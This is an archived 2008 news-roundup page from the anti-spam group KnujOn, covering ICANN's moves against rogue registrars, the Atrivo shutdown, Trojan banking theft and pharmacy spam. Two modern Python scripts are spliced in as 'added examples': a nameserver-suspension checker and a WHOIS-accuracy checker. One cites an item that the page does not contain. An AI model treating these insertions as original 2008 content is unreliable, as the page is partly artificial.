Paper letters may also be sent to: Internet Corporation for Assigned Names and Numbers (ICANN), 4676 Admiralty Way, Suite 330, Marina del Rey, CA 90292-6601, OR 1875 I (EYE) Street, NW, Suite 501, Washington DC, 20006, OR 6 Rond Point Schuman Bt. 5 Brussels B-1040 Belgium.
*Please note that the dedicated mail address for the RAA (raa-consultation@icann.org) is no longer accepting email; they have been notified of this but we have no further information at this time.
More Information
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
November 1, 2008
Researchers at RSA report that a Trojan has quietly stolen login credentials from approximately 300,000 online bank accounts, a similar number of credit and debit cards, and an uncounted number of email and FTP accounts.
The Sinowal Trojan, also known as Torpig and Mebroot, has been stealing data for almost three years, RSA says. The new findings suggest that Sinowal "may be one of the most pervasive and advanced pieces of crimeware ever created by fraudsters," the researchers say in a blog published today. Little is known about Sinowal's source, RSA says. Some have alleged that it was owned and operated by a Russian online gang with past ties to the infamous Russian Business Network (RBN). "Our data confirms the Sinowal Trojan has had strong ties to the RBN in the past, but our research indicates that the current hosting facilities of Sinowal may have changed and are no longer connected to the RBN," the researchers say. (darkreading.com)
Virtual Heist Nets 500,000+ Bank, Credit Accounts (washingtonpost.com)
KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
October 31, 2008
Thanks for having KnujOn at this venue. It was great to meet more professionals in the industry who
are concerned about these issues.


KnujOn Public Appearances
November 2-7 ICANN Meeting (cai.icann.org)
October 30, 2008
On 28 October 2008, ICANN sent a notice of termination to EstDomains. Based on an Estonian Court record, ICANN has reason to believe that the president of EstDomains, Vladimir Tsastsin, was convicted of credit card fraud, money laundering and document forgery on 6 February 2008.
ICANN received a response from EstDomains regarding the notice of termination. To assess the merits of the claims made in EstDomains’ response, ICANN has stayed the termination process as ICANN analyzes these claims.
(icann.org)
http://www.icann.org/correspondence/burnette-to-tsastsin-28oct08-en.pdf
http://www.icann.org/correspondence/poltev-to-burnette-29oct08-en.pdf
ICANN does a quick about-face on EstDomains' de-accreditation (thestandard.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
November 2-7 ICANN Meeting (cai.icann.org)
October 29, 2008 - Extra!
Be advised that the Internet Corporation for Assigned Names and Numbers (ICANN) Registrar Accreditation Agreement (RAA) for EstDomains, Inc. (Customer No. 919, IANA No. 832) is terminated. Consistent with subsection 5.3.3 of the RAA, this termination is based on your status as President of EstDomains and your credit card fraud, money laundering and document forgery conviction. This termination shall be effective within fifteen calendar days from the date of this letter, on 12 November 2008...
(icann.org)
ICANN De-Accredits EstDomains for CEO's Fraud Convictions:
The entity responsible for overseeing the Internet's domain name system said Tuesday that it was revoking the right of registrar EstDomains.com to process new domain names, citing the company CEO's recent conviction on cyber crime charges...
Kudos to ICANN, and to others -- particularly HostExploit.com and Knujon -- who contributed to shining a light on EstDomains' storied history and practices.
(voices.washingtonpost.com)
ICANN Terminates Accreditation of Notorious Malware Hosting Domain Registrar EstDomains:
The EstDomain company was founded in Tartu, the second largest Estonian city, but it has also been registered as a company in Delaware, US. In a report from KnujOn regarding EstDomain’s activity, it is noted that “Delaware is a tiny state that earns its keep by being very business-friendly. Typically, any business incorporated in Delaware is not actually there”. This prompted several security professionals to question the ICANN practices of accrediting companies that don't really exist where they were incorporated.
(news.softpedia.com)
Three cheers for ICANN! (avertlabs.com)
RBN Farewell To Estdomains (rbnexploit.blogspot.com)
One criminal Internet registrar down... (weblog.infoworld.com)
History
USA Internet community fighting against botnet purveyors
Phishing and Fraud - ICANN Heeds Call to Ban Abusive Registrars
InterCage Back Up - Blames EstDomains for Their Woes
KnujOn.com Calls on Internet Community to End the Fake Pharmacy Menace
More Follow-up And Fallout
EstDomains Continues to Deny Real Location
EstDomains: A Sordid History and a Storied CEO
Atrivo and ESTDomains
Directi Responds to KnujOn Report - Dumps Controversial Service
EstDomains Controversy Continues
SpamHaus Backs-Up HostExploit Report/Wash Post Article
Examining the Role of Registrars in Illicit Activity
Underground Steroid Websites Flourish at U.S. Registrars
Steroid Sites Registered Through EstDomains
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 29, 2008
Mesomorphosis.com, a steroid law reform website, emailed us with some questions about our request to
GoDaddy and other US-based registrars to terminate some steroids websites.
Most, but not all, of the websites were terminated.
Mesomorphosis asked some great questions, and we’re happy to answer them...
(legitscript.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 28, 2008
The "Internet Dark Arts" panel on Thursday at the WebbyConnect conference featured a former affiliate marketing player named Mike Geiger, who used to have what sounded like a thriving side business setting up sites that sent affiliate traffic to illicit pharmaceutical sites.
These are the sites that offer Viagra and other drugs to customers without a doctor's prescription. The affiliate programs are responsible for an avalanche of spam, but what's really scary is the potential for injury to people who shouldn't be consuming the drugs in the first place, or only under the dosages prescribed by a physician or pharmacist.
Geiger was unrepentant about his role in the trade. Affiliate marketing is a "completely legit business," he said, and went on to describe himself as a mere middleman uninvolved with the actual distribution of the drugs. Cash was the obvious reason for getting into affiliate marketing, and Geiger revealed the rewards for pharmaceutical sites were particularly good.
"Why did I choose pharmaceuticals? It was very simple," he said. "[It was] because I would get up to 45% of whatever I sold." This compares to retail affiliate programs offered by Amazon.com and others, where the cut is usually in the low single digits.
(thestandard.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 27, 2008
"There isn't too much to figure out what's happening here. There are several reasons responsible for this as well as other victories in the war against spam and other Internet abuses, one of them being the shutdown of rogue registrars. One of the major soldiers in the trenches can be found at knujon.com which also does a pretty good job of posting up all the news and reports from the battle field."
(news.cnet.com)

KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 26, 2008
The internet domain registrar GoDaddy has started shutting down anabolic steroid-related websites under increasing pressure from a pharmacy special interest group called LegitScript.com. LegitScript.com is an internet pharmacy verification service that approves pharmacies that conform to United States federal and state laws.
GoDaddy recently shutdown the following steroid pharmacy websites ominously listing the nameservers as NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM and NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM:
(mesomorphosis.com)
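The suspension nameservers quoted above are a cheap, observable signal: once a registrar re-points a domain's delegation at names like NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM, anyone following up a list of reported domains can confirm the takedown from NS records alone, without trusting the registrar's reply. The checker below is an added example, not code from GoDaddy, LegitScript or KnujOn. It parses dig-style NS answer lines, normalises trailing dots and case, and classifies each reported domain as suspended, still active, or no longer delegated. The answer lines, the domain names and the `example-dns.test` nameservers are constructed sample data; the only suspension pattern it knows is the one quoted on this page.

```python
import re
from collections import defaultdict

# Nameserver suffixes that announce a registrar-side suspension. Only the pair
# quoted in the mesomorphosis.com item is known from this page; extend the
# tuple with patterns you have verified yourself.
SUSPENSION_MARKERS = ("suspended-for.spam-and-abuse.com",)

# One resource record per line, as printed in a `dig NS` answer section:
#   owner.  TTL  IN  NS  target.
RR_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+NS\s+(\S+)$")

# Constructed sample answers (no real lookups were made).
SAMPLE_ANSWERS = """\
; constructed sample modelled on dig NS answer sections
reported-site-1.test.   3600    IN      NS      NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM.
reported-site-1.test.   3600    IN      NS      NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM.
reported-site-2.test.   3600    IN      NS      ns1.example-dns.test.
reported-site-2.test.   3600    IN      NS      ns2.example-dns.test.
"""

# The list being followed up; the third name returned no NS records at all.
REPORTED = ["reported-site-1.test", "Reported-Site-2.test", "reported-site-3.test"]


def normalise(name: str) -> str:
    """DNS names are case-insensitive; strip the trailing root dot too."""
    return name.rstrip(".").lower()


def parse_ns_answers(text: str) -> dict:
    """Group NS targets by owner name, skipping comments and non-NS lines."""
    ns_by_domain = defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        match = RR_RE.match(line)
        if not match:
            continue
        owner, target = normalise(match.group(1)), normalise(match.group(2))
        ns_by_domain[owner].append(target)
    return dict(ns_by_domain)


def classify(nameservers: list) -> str:
    """Map a domain's NS set to one of: suspended, active, no-delegation."""
    if not nameservers:
        return "no-delegation"
    for ns in nameservers:
        if any(ns == marker or ns.endswith("." + marker) for marker in SUSPENSION_MARKERS):
            return "suspended"
    return "active"


def follow_up(reported: list, answers_text: str) -> dict:
    """Status per reported domain, keyed by the domain as given in the list."""
    ns_by_domain = parse_ns_answers(answers_text)
    return {d: classify(ns_by_domain.get(normalise(d), [])) for d in reported}


def summarise(statuses: dict) -> dict:
    """Count how many domains fell into each status."""
    counts = defaultdict(int)
    for status in statuses.values():
        counts[status] += 1
    return dict(counts)


if __name__ == "__main__":
    result = follow_up(REPORTED, SAMPLE_ANSWERS)
    for domain, status in result.items():
        print(f"{domain:24s} {status}")
    print(summarise(result))
```

In practice the answer text would come from your own resolver queries for each reported domain; keeping the parser separate from the lookup means the same classification can be re-run on saved output when a registrar later disputes the timeline.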
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 25, 2008
One thing Google has really done a good job of is implementing a few unique features into Gmail that other mainstream email services don’t offer. To give you an example, IMAP support. Of course some services do offer it, but many, especially those that are free, do not. Not only does Google offer IMAP support for free, they recently “Turbo Charged” it and have gone above and beyond what many ever expected them to do when they requested such a feature.
To access these advanced IMAP features, you’ll first have to enable “Advanced IMAP Controls” from the Labs section in Gmail. This is the same place you may have gone to enable those Google Goggles we talked about the other day. Once it is enabled, you’ll be able to go to your settings and configure everything the way you would like it to be.
(cybernetnews.com)
"Great! now i can download all my gmail spam and forward it to Knujon with ease.
Die evil Spammers (or at least go to jail)."
(cybernetnews.com)
From the team that brought you Mail Goggles, here comes...Advanced IMAP Controls, a Labs feature that lets you fine-tune your Gmail IMAP experience. You can choose which labels to sync in IMAP -- useful if you find your mail client choking on a big [Gmail]/All Mail folder.
After enabling this Lab, just go to the Labels tab under Settings. You'll see a new 'Show in IMAP' checkbox next to each of your labels. Uncheck the box and the corresponding folder will disappear from IMAP.
(gmailblog.blogspot.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 24, 2008
The final tallies of HostExploit's and KnujOn's push against illicit sites at Directi in August: over 175 thousand domains have been suspended by Directi.

Directi Domain Abuse Actions - Report Oct 09 (hostexploit.com)
FBI, FTC Take Down Scammers & Spammers (washingtonpost.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 23, 2008
The Internet's main governing body, ICANN (The Internet Corporation for Assigned Names and Numbers), said on October 15, 2008 that a German organization, Joker.com, and a Chinese organization, DNS.com.cn, are selling domain addresses connected to spam mails.
Anti-spam site Knujon.com stated that spammers appear to prefer Websites registered through DNS.com.cn and Joker.com. After exhaustively analyzing junk e-mails for six months, Knujon discovered that 3.3% of Websites registered with DNS.com.cn, over 10,000 in total, were referred to in spam mails. And over 9,000 Websites registered with Joker.com, 1.42% in total, were also linked to spam mails.
(spamfighter.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 21, 2008
ICANN had sent enforcement notices to several domain registrars identified by KnujOn, an anti-spam organization, as having registered the majority of illicit Web sites using spam to generate traffic. KnujOn said 90 percent of Web sites are clustered on just 20 registrars. That represents only 2.5 percent of the 800 registrars accredited by ICANN.
(gcn.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 20, 2008
John Levine, author of The Internet For Dummies, Fighting Spam for Dummies and a dozen other technical books, got into a heated public discussion with ICANN's Kieren McCarthy about Registrar compliance in which Levine ponders: "Perhaps you should hire the Knujon guys" [to fix the whois compliance issues].
"ICANN can't audit the WHOIS data, so it's my job to do so? Aw, come on. WDPRS is a useful band-aid to help with the enormous backlog of bogus WHOIS, but if the compliance process worked, ICANN would find the bad stuff themselves rather than expecting unpaid volunteers to do their work for them. Perhaps you should hire the Knujon guys. And, as I've pointed out, the compliance issues only begin with bogus WHOIS. There's registrars with no WHOIS at all, and lots of other egregious violations that I know that [ICANN] knows about." (circleid.com)
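Both the 3 November item on WHOIS accuracy and Levine's complaint about the backlog of bogus WHOIS come down to one triage step: looking at a registrant record and deciding whether the required fields are filled with anything plausible before filing a WDPRS report. The script below is an added example written for this page, not KnujOn's tooling or any ICANN process. It assumes the common "Registrant Field: value" text layout (real registrar output varies and needs per-registrar parsing), and the two sample records, the `.test` domains and the placeholder heuristics are constructed for illustration.

```python
import re

# Free-text registrant fields the RAA expects to be complete and accurate.
REQUIRED_TEXT_FIELDS = ("Registrant Name", "Registrant Street",
                        "Registrant City", "Registrant Country")

# Values that commonly show up when a registrant typed junk into a required
# field (constructed list; tune it to what you see in your own reports).
PLACEHOLDERS = {"", "n/a", "na", "none", "null", "unknown", "-", ".",
                "xxx", "test", "asdf", "qwerty", "abc", "123"}

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[A-Za-z]{2,}$")
# ICANN-style phone notation: +<country code>.<subscriber number>
PHONE_RE = re.compile(r"^\+\d{1,3}\.\d{4,14}$")

# Constructed sample records (not real WHOIS output).
SAMPLE_GOOD = """\
Domain Name: EXAMPLE.TEST
Registrar: Example Registrar, Inc.
Registrant Name: Jane Doe
Registrant Street: 1 Main Street
Registrant City: Springfield
Registrant Country: US
Registrant Phone: +1.5555550100
Registrant Email: jane.doe@example.test
"""

SAMPLE_BAD = """\
Domain Name: EXAMPLE-PHARMA.TEST
Registrar: Example Registrar, Inc.
Registrant Name: asdf asdf
Registrant Organization:
Registrant Street: 123
Registrant City: xxx
Registrant Country: Not Given
Registrant Phone: 1234
Registrant Email: nobody@nowhere
"""


def parse_whois(text: str) -> dict:
    """Turn 'Key: value' lines into a dict, ignoring comments and blank lines."""
    record = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("%", "#", ">>>")):
            continue
        key, sep, value = line.partition(":")
        if sep:
            record[key.strip()] = value.strip()
    return record


def looks_bogus(value: str) -> bool:
    """Heuristics for placeholder or obviously fake free-text values."""
    v = value.strip().lower()
    if v in PLACEHOLDERS:
        return True
    tokens = v.split()
    if tokens and all(t in PLACEHOLDERS for t in tokens):
        return True
    if re.fullmatch(r"(.)\1{2,}", v):        # "aaa", "1111"
        return True
    if not re.search(r"[a-z]", v):           # no letters at all
        return True
    return False


def check_record(record: dict) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    for field in REQUIRED_TEXT_FIELDS:
        value = record.get(field, "")
        if looks_bogus(value):
            findings.append(f"{field}: missing or placeholder value {value!r}")
    country = record.get("Registrant Country", "")
    if country and not re.fullmatch(r"[A-Za-z]{2}", country):
        findings.append(f"Registrant Country: {country!r} is not a two-letter code")
    phone = record.get("Registrant Phone", "")
    if not PHONE_RE.match(phone):
        findings.append(f"Registrant Phone: {phone!r} is not in +CC.number form")
    email = record.get("Registrant Email", "")
    if not EMAIL_RE.match(email):
        findings.append(f"Registrant Email: {email!r} is not a usable address")
    return findings


def audit_whois(text: str) -> list:
    """Parse and check one raw WHOIS record."""
    return check_record(parse_whois(text))


if __name__ == "__main__":
    for label, sample in (("good", SAMPLE_GOOD), ("bad", SAMPLE_BAD)):
        print(label, audit_whois(sample) or "no findings")
```

A record that passes these checks can still be false (a real-looking address that belongs to someone else), so the output is a queue for human review, not proof of inaccuracy; the value is in pushing the obvious junk to the front of a large backlog.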
Cluck, Cluck… ICANN and Contract Compliance Enforcement (circleid.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 19, 2008
The French Cabinet's spokesman says "swindlers" have broken into the personal bank account of President Nicolas Sarkozy.
Spokesman Luc Chatel told France's Radio-J an investigation is under way and insists the incident "proves that this system of checking (bank accounts) via the Internet isn't infallible." He did not elaborate.
(cnn.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 17, 2008
The infamous Storm worm, which powered a network of thousands of compromised PCs once responsible for sending more than 20 percent of all spam, appears to have died off. Security experts say Storm's death knell was sounded by the recent shutdown of Atrivo, a California based ISP that was home to a number of criminal cyber crime operations, including at least three of the master servers used to control the Storm network.
(washingtonpost.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 16, 2008
The Internet Corporation for Assigned Names and Numbers (ICANN) said the Chinese company, DNS.com.cn, hadn't properly investigated who owns several of the Web addresses it sold.
ICANN also said it had investigated similar problems at a German company, Joker.com, but found the site's owners had properly investigated similar complaints.
(axcessnews.com)
KnujOn Public Appearances
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 15, 2008
A U.S. district court has ordered a halt to the operations of a vast international spam network that peddled prescription drugs and bogus male-enhancement products. The network has been identified as the largest “spam gang” in the world by the anti-spam organization Spamhaus. The Federal Trade Commission has received more than three million complaints about spam messages connected to this operation, and estimates that it may be responsible for sending billions of illegal spam messages. At the request of the FTC, the court has issued a temporary injunction prohibiting defendants from spamming and making false product claims, and has frozen the defendants’ assets to preserve them for consumer redress pending trial. Authorities in New Zealand also have taken legal action, working in tandem with the FTC.
According to papers filed with the court, the defendants deceptively marketed a variety of products through spam messages, including a male-enhancement pill, prescription drugs, and a weight-loss pill.
One product called “VPXL” was touted as an herbal male-enhancement pill. Advertised as “100% herbal and safe,” it supposedly caused a permanent increase in the size of a user’s penis. The agency alleged that not only did the pills not work, but they were neither “100% herbal” nor “safe,” because they contained sildenafil – the active ingredient in Viagra. At the FTC’s request, the pills were tested by the FDA. According to medical experts, men taking nitrate-containing drugs – which are commonly prescribed to treat diabetes, high blood pressure, high cholesterol, or heart disease – can experience an unsafe drop in their blood pressure when they also take sildenafil. (ftc.gov)
Herbal King gang sent billions of spam messages pushing prescription drugs and phony male-enhancement products:
Garth Bruen, creator of KnujOn, which fights email abuse and online fraud, says the shutdown of Herbal King is “awesome.” “The feds are waking from their slumber,” Bruen says. “CastleCops, Spamhaus and others have done remarkable work. It's been years in the making, [and] these VPXL sleazebags have been raking the money in.”
(darkreading.com)
ICANN Warns Domain Registrars over Compliance (mediacircus.com)
Measurable Drop In Nefarious UCE Activity After Atrivo Demise (infosecurity.us)
Intercage demise causes spam levels to fall (vnunet.com)
Atrivo ISP shutdown sends ripples through the spam deluge (arstechnica.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 14, 2008
For some time now, a number of independent and volunteer online security research groups have been releasing reports on criminal activities supported by such ISPs as Intercage, a network provider based in California, and EstDomains, a domain name registrar allegedly located in Delaware. Research conducted by HostExploit, StopBadware.org, Spamhaus and Knujon divulged the facts about the involvement of Intercage, also known as Atrivo, and EstDomains in the cyber crime business, including malware downloads to unsuspecting users, porno product and steroid distribution and spyware installation to rob users of their financial data. An independent study was also initiated by Brian Krebs, who leads the Security Fix section at the Washington Post. The latter was turned into a kind of a forum where disgraced firms posted their confutation of the information presented by the security researchers while their customers, obviously Russians, touched on the raw, expressed their despite towards American consolidated efforts directed to weaken the adverse impact of criminal syndicates on Internet subscribers in the US.
(ecommerce-journal.com)
Cluck, Cluck… ICANN and Contract Compliance Enforcement (circleid.com)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 13, 2008
HUNCHED over a computer terminal in his pyjamas, "Frank" makes more money than a small-time drug dealer without ever having to worry about being caught or even leaving the house.
Constantly covering his tracks via a complex web of internet servers, he is part of a global network of cyber thieves who together fleece billions of dollars from unsuspecting internet users every year - using little more than an internet connection, free software and some spare time.
Speaking to the Herald on the condition of anonymity, he and other experienced hackers say banks' attempts to stamp out credit card theft are doomed due to the ease with which clients' computers can be compromised.
(smh.com.au)
KnujOn Public Appearances
October 14-16 Anti-Phishing Working Group eCrime Researchers Summit "APWG" (antiphishing.org)
October 30-31 Information Security Summit (informationsecuritysummit.org)
October 12, 2008
Security experts and the federal government are warning that scam artists are leveraging public concern over the global financial crisis to steal sensitive financial data and spread malicious software.
In an alert posted Thursday, the Federal Trade Commission urged Internet users to be on guard against e-mails that look as if they come from a financial institution that recently acquired a consumer's bank, savings and loan, or mortgage.
(washingtonpost.com)
October 11, 2008
The World Bank Group's computer network — one of the largest repositories of sensitive data about the economies of every nation — has been raided repeatedly by outsiders for more than a year, FOX News has learned.
It is still not known how much information was stolen. But sources inside the bank confirm that servers in the institution's highly-restricted treasury unit were deeply penetrated with spy software last April. Invaders also had full access to the rest of the bank's network for nearly a month in June and July.
In total, at least six major intrusions — two of them using the same group of IP addresses originating from China — have been detected at the World Bank since the summer of 2007, with the most recent breach occurring just last month.
(foxnews.com)
October 10, 2008
Security Fix has spilled quite a bit of digital ink chronicling the demise of Atrivo (a.k.a. "Intercage"), a now-defunct Northern Calif. based Internet service provider that served as home base for a large number of cyber criminal operations. Happily, data released this week about a short-lived but precipitous decline in the level of badness online after Atrivo was shut down illustrates just how bad Atrivo was.

Internet security firm MessageLabs said it observed a significant drop in the level of spam and botnet activity after Atrivo's upstream Internet providers pulled the plug on the company last month. The graphic to the right shows a collapse in the level of spam emanating from computers infected with some of the nastiest spam-enabling malware, including the Storm worm, Cutwail, Srizbi and MegaD.
MessageLabs said the decline was due to the fact that a large number of command and control networks used to control these distributed malware spam systems were located on servers on Atrivo's network.
(washingtonpost.com)
October 9, 2008
The APWG’s Internet Policy Committee (APWG-IPC) and Carnegie Mellon University’s Supporting Trust Decisions Project (STDP) have joined forces to educate consumers about phishing and, in doing so, have established the APWG/CMU Phishing Education Landing Page Program. The goal of this initiative is to instruct consumers on online safety at the “most teachable moment”: when they have just clicked on a link in a phishing communication.
(education.apwg.org)
October 8, 2008
ICANN may wonder why organizations like KnujOn exist and regularly publish reports about registrars who fail to comply with even the regulations ICANN can enforce, and so much criticism is directed at the organization for being "toothless." Looking at a year-long process to levy what is essentially wrist-slap for allowing spammers to register domains with false or missing information and then backing down might be a good place to start. A year is far too long to deal with the problem of spammers, who have usually moved on well before ICANN even begins their process to register other domains.
(thestandard.com)
Spammers Favor Obama Over McCain 7 to 1 (washingtonpost.com)
Palin E-Mail Hacker Indicted (foxnews.com)
October 7, 2008
The phone rang. It was from 626-273-8207. I answered. It was the infamous "car warranty" call. Most folks hang up, and should, but for us it was a chance to get into the inner workings of the telephone scam world. The automated message said: "Press 2 to continue." After pressing 2 we were on hold for a very long time. Finally, a very gruff and tired voice answered:
Gruff Scam Man: Car warranty department, may I have the make and model of your car?
KnujOn: Actually, can I have the name of your company?
Gruff Scam Man: No.
KnujOn: Why not?
Gruff Scam Man hung up.
The carrier of this number is Digitcom Services, Inc. Alhambra, CA, somewhat irrelevant because they dump these numbers frequently and get new ones as they are blocked. The real issue is who benefits from this?
The bulk of the companies doing this are located near St. Louis. The Better Business Bureau of Eastern Missouri and Southern Illinois lists 92 extended warranty companies in that area. They are responsible for a huge number of complaints from across the country.
(msnbc.msn.com)
Auto One is located in Irvine, Calif., and is a subsidiary of Credexx, a loan consolidator. It caught the attention of the Better Business Bureau last year due to the high number of complaints about its warranty expiration notices and difficulty processing claims. The Bureau rated the company an F.
According to Bureau records, the president of Auto One is David Tabb, 41, a man with a history of dicey consumer practices. Another of Tabb's companies, Hollywood Dreams, was listed at an address next door to Auto One. Hollywood Dreams was a company used as a front for selling sports and Hollywood memorabilia with forged signatures. In 2002 Tabb pleaded guilty to one count of conspiracy to commit mail fraud and one count of tax evasion for his part in a scam to sell the forged merchandise. According to the indictment filed in U.S. District Court, Tabb arranged to meet an undercover federal agent at a Chevron gas station in Irvine to sell him basketballs and other sporting items with forged signatures and fake certificates of authenticity. He continued to sell undercover feds forged merchandise, usually in parking lots, over the next year. Tabb did not respond to messages left at his last known home number or Auto One offices.
(seattleweekly.com)
October 6, 2008
A member of the European Parliament, William Newton-Dunn, has recently been addressing questions to the European Commission which ask whether ICANN is engaging in restraint of European free trade laws by imposing restrictions on who can operate a TLD and sell domain names. Some restrictions are considered insurmountable by many small business owners and individuals, such as the non-refundable $50,000 application fee.
(gambling911.com)
October 5, 2008
ICANN had actually sent initial "Notices of Concern" regarding the same issue to both firms in May after an initial report listing abusive registrars was published by KnujOn, which recently pushed another major registrar, Directi, to mend its own ways and another, EstDomains, to promise to do the same.
"Both (DNS.com.cn, and Joker.com) subsequently assured ICANN that they were investigating Whois inaccuracy claims and had suitable processes in place to do so. However, ICANN found compelling evidence leading to a conclusion that both DNS.com.cn and Joker.com do not appear to be taking reasonable steps to investigate these claims as required," ICANN said in a statement.
To avoid the commencement of the termination process, DNS.com.cn and Joker.com must now "cure the cited breaches within 15 days."
If not, ICANN said it will "pursue all remedies available under the terms of the RAA, including possible termination."
(securitywatch.eweek.com)
Analysis: Bringing law to the Internet (metimes.com)
October 4, 2008
The Internet Corporation for Assigned Names and Numbers, known as ICANN, sent formal breach notices Tuesday to two of the registrars that it accredits, giving them 15 days to fix the problem or lose their accreditation. The registrars - Swiss-based Joker.com and Beijing Innovative Linkage Technology Ltd., doing business as DNS.com.cn - lease out about 900,000 Internet addresses, known as domain names.
...
"We are sending a message in public ... that everyone needs to be vigilant," said Paul Levins, ICANN's vice president for corporate affairs.
...
"There are some domain registrars who facilitate criminal activities on the Web by turning a blind eye" to registrants who deliberately provide false or incomplete Whois information, said Garth Bruen of the anti-spam advocacy group KnujOn - "no junk" spelled backward.
He says a hard core of registrars rent most of the domain names that contain the Web sites advertised in spam e-mails — billions of unsolicited messages sent every year, mostly by so-called botnets of personal computers that, unbeknown to their owners, have been taken over by hackers and other cybercriminals.
Earlier this year, Mr. Bruen analyzed millions of spam e-mail messages forwarded by members of the public. He concluded that 90 percent of the Web addresses the spam advertised had been leased by just 20 registrars.
(washingtontimes.com)
October 3, 2008
Two days ago ICANN issued breach notices to Joker and Beijing Innovative Linkage Technology Ltd (DNS.com.cn) which should lead to their de-accreditation by October 14th. Beijing Innovative and Joker were numbers 2 and 4 on KnujOn's 10 Worst List, respectively.
Every KnujOn participant and supporter needs to give themselves a big pat on the back tonight because YOU made this happen. KnujOn processed your submissions and filed thousands of complaints and tracked them continuously to ensure contracts were observed and the public trust was not broken. In May of this year ICANN responded to KnujOn's report by issuing enforcement notices against the rogue Registrars. Some of these Registrars have made amazing improvements since the report was released, but the two being issued breach notices this week did little or nothing and are now paying the price for policy failure. More to come soon.
Internet body cracking down on shady Web sites (upi.com)
October 2, 2008
ICANN has sent breach notices to two ICANN-accredited registrars, Beijing Innovative Linkage Technology Ltd., doing business as DNS.com.cn and Joker.com, on 30 September 2008.
These registrars failed to comply with Section 3.7.8 of the Registrar Accreditation Agreement (RAA) which requires registrars to take "reasonable steps to investigate" Whois inaccuracy claims.
Section 3.7.8 of the RAA requires registrars, "…upon notification by any person of an inaccuracy in the contact information associated with a Registered Name sponsored by Registrar, take reasonable steps to investigate the claimed inaccuracy. In the event Registrar learns of inaccurate contact information associated with a Registered Name it sponsors, it shall take reasonable steps to correct that inaccuracy."
In November 2007, ICANN audited registrar compliance with the investigation of Whois inaccuracy claims filed through ICANN's Whois Data Problem Report System (WDPRS). The audit analyzes the complaints as well as complainant follow-up correspondence indicating "no change" to Whois data 45 days after the claim is filed. Registrars that appear to take no action in response to a significant percentage of WDPRS complaints are sent a Notice of Concern that requests they provide ICANN with details regarding the steps taken to investigate the claimed Whois inaccuracies - as required by Section 3.7.8 of the RAA.
On 29 May 2008, ICANN sent Joker.com and DNS.com.cn Notices of Concern. Both subsequently assured ICANN that they were investigating Whois inaccuracy claims and had suitable processes in place to do so. However, ICANN found compelling evidence leading to a conclusion that both DNS.com.cn and Joker.com do not appear to be taking reasonable steps to investigate these claims as required.
Accordingly, on 30 September 2008 ICANN sent DNS.com.cn and Joker.com notices of breach of contract. To avoid the commencement of the termination process, DNS.com.cn and Joker.com must cure the cited breaches within 15 days. ICANN will pursue all remedies available under the terms of the RAA, including possible termination, if DNS.com.cn and Joker.com fail to cure the cited breaches.
DNS.com.cn has over 300,000 domain names under management and Joker.com has over 600,000 domain names under management.
ICANN's efforts to improve Whois accuracy are ongoing and registrars are advised to investigate every claim of Whois inaccuracy received as required by Section 3.7.8 of the RAA to avoid compliance action by ICANN.
(icann.org)
October 1, 2008
KnujOn's Garth Bruen attended and spoke at the Improving Institutional Confidence in ICANN public session at the National Press Club in Washington, D.C. This was a very intense and insightful meeting. The details will be discussed here extensively in the next week.
September 27, 2008
The House of Representatives on Tuesday passed the Ryan Haight Online Pharmacy Consumer Protection Act, a bill that would ban the sale or distribution of prescription drugs over the Internet without a valid prescription. Matching legislation passed in the Senate in April, but the House sent its version back to the Senate with amendments on Thursday.
Under the proposed law, online pharmacies would have to comply with pharmacy licensing laws in each state in which they do business and register with the relevant state attorneys general. Some congressmen questioned the impact of the bill, given that so many online pharmacies that distribute drugs without prescriptions are based outside the U.S. (cnet.com)
September 26, 2008
KnujOn received a standing ovation at the closing session of The Messaging Anti-Abuse Working Group (maawg.org) meeting in Fort Lauderdale, Florida. The community has expressed its appreciation of our work and has taken steps to continue supporting us.
September 25, 2008
KnujOn has presented to many law enforcement, investigative, and anti-abuse groups. This was our first presentation to a group specifically dedicated to security software development. In one of the largest conferences of its kind, The Open Web Application Security Project (owasp.org) brought together an unprecedented number of experts in the field to discuss the state of software security. KnujOn effectively delivered the message that good software needs good policy (and vice-versa). KnujOn wants to thank Tom Brennan specifically for inviting us.
September 24, 2008
A day after security experts celebrated the death of a network provider accused of hosting a large concentration of the world's cybercrime, California-based Intercage appeared to be among the living again.
